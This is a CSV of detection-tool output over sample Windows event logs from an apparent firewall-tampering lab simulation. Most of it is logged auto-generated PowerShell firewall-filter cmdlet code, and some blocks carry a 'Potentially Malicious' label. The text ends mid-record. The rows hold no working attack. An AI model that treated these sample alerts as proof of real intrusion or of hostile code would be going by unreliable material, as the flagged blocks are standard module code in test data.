Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.926 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.927 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.927 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.973 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' 
function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.973 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' -Alias '*' 
function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 
Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.974 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.975 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.975 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.975 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): 
name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.000 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] 
